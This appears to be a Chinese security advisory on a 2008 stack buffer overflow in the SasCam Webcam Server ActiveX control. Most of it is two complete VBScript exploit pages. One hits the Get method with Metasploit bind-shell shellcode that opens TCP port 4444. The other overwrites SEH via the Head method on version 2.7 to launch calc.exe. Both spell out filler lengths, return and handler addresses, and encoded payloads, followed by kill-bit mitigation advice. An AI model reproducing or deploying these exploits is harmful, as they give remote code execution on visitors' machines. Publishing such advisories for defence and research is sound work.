SasCam Webcam Server ActiveX控件Get方式缓冲区溢出漏洞

发布日期:2008-12-29
更新日期:2008-12-30

受影响系统:
SaschArt SasCam WebCam Server 2.6.5
(本页随附的第二个测试程序表明 2.7 版的 Head 方法同样存在同类溢出,2.7 版用户亦应视为受影响)
描述:
BUGTRAQ  ID: 33053

SasCam Webcam Server是用于从桌面或站点播放、广播视频流的工具。

Webcam Server ActiveX控件(CLSID 0297D24A-F425-47EE-9F3B-A459BCE593E3)的 Get 方法没有正确地验证所传入字符串的长度,如果用户受骗访问了恶意网页,网页向该方法传入超长参数即可触发栈缓冲区溢出(覆盖返回地址或 SEH 异常处理记录),导致以当前浏览器用户的权限执行任意指令。

<*来源:callAX (callax@shellcode.com.ar) *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

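<html>
<!-- PoC: SasCam Webcam Server 2.6.5 ActiveX control - stack overflow via the Get method.
     Research/teaching use only. The payload below is described by its author as a
     Metasploit bind shell listening on TCP 4444, so running this page leaves a
     listener on the host: run it only on an isolated lab machine. -->
<object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3' id='cr4sh'></object>
<input language=VBScript onclick=rootIT() type=button value="3xpl0iT-IT!">
<script language = 'vbscript'>
' Builds the overflowing string (filler + return address + NOP sled + payload)
' and passes it to the control's Get method.
Sub rootIT()

  ' Filler up to the saved return address (8293 bytes, as found by the author).
  put_s0m3_shit  = String(8293, "a")

  ' Return address 0x77E37EEC, a "call esp" in User32.dll on the author's system.
  ' NOTE: this address depends on the exact Windows/User32 build and must be
  ' re-located elsewhere (VBScript comments use ' - the original "//" here was not a comment).
  eip               = unescape("%EC%7E%E3%77")  ' call esp User32.dll Module 77 E3 7E EC

  ' Short NOP sled in front of the payload.
  noping            = String(20, unescape("%90"))

' This exploit opens the port 4444. Thanks to Metasploit for Shellcode

lnj3ctc0d3 =  unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
               unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
               unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
               unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
               unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
               unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
               unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
               unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
               unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _
               unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _
               unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _
               unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _
               unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _
               unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _
               unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _
               unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _
               unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _
               unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _
               unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _
               unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _
               unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _
               unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _
               unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _
               unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _
               unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _
               unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _
               unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _
               unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _
               unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _
               unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _
               unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _
               unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _
               unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _
               unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _
               unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _
               unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _
               unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _
               unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _
               unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _
               unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _
               unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _
               unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _
               unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _
               unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _
               unescape("%4f%4f%42%4d%5a")

  ' Final buffer: filler, overwritten return address, sled, payload.
  this_is_my_gift = put_s0m3_shit + eip + noping + lnj3ctc0d3

  ' Trigger: the oversized string is passed to the vulnerable Get method.
  cr4sh.Get this_is_my_gift

End Sub

</script>
</html>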


# Exploit Title: SasCam 2.7 ActiveX Head Buffer Overflow  

# Date: July 4, 2010  

# Author: Blake  

# Software Link:http://download.cnet.com/SasCam-Webcam-Server/3000-2348_4-10491197.html  

# Version: 2.7  

# Tested on: Windows XP SP3 / IE6 and 7  

  

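<html>
<!-- PoC: SasCam 2.7 ActiveX control (XHTTP.dll) - SEH overwrite via the Head method.
     Research/teaching use only. The payload launches calc.exe (Metasploit,
     Alpha2-encoded, EXITFUNC=seh). The SEH handler address is taken from
     msacm32.drv on Windows XP SP3 (the author's test platform) and will not hold
     on other Windows builds. -->
<object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3' id='target'></object>
<script language='vbscript'>

'for debugging/custom prolog
'targetFile = "C:\Program Files\SasCam_free\XHTTP.dll"
'prototype  = "Sub Head ( ByVal sURL As String )"
'memberName = "Head"
'progid     = "XHTTP.HTTP"
'argCount   = 1

'EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2
sc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
unescape("%50%68")

' Filler up to the SEH record (8349 bytes, as found by the author).
buffer = String(8349, "A")
' Next-SEH pointer: "jmp short +6" (EB 06) over the handler pointer into the sled.
next_seh = unescape("%eb%06%90%90")
' Handler pointer: 0x72D12956 in msacm32.drv on Windows XP SP3; rebase for other builds.
seh = unescape("%56%29%d1%72")                ' 0x72D12956 [msacm32.drv]
nops = String(20, unescape("%90"))                  ' nop sled
' Trailing padding after the payload (presumably to force the access violation
' that makes the overwritten handler run - verify on the target).
junk = String(4151, "B")

exploit = buffer + next_seh + seh + nops + sc + junk

' Trigger: the oversized string is passed to the vulnerable Head method.
target.Head exploit

</script>
</html>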

建议:
厂商补丁:

SaschArt
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布前,可以通过为该控件的 CLSID(0297D24A-F425-47EE-9F3B-A459BCE593E3)设置 Kill Bit 来阻止 IE 加载此控件,或在浏览器中禁用/提示运行 ActiveX 控件以降低风险。此外请注意,本页第一个测试程序的 shellcode 会在本机打开 TCP 4444 端口的监听,仅应在隔离的测试环境中运行:

http://soft.saschart.com/

本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载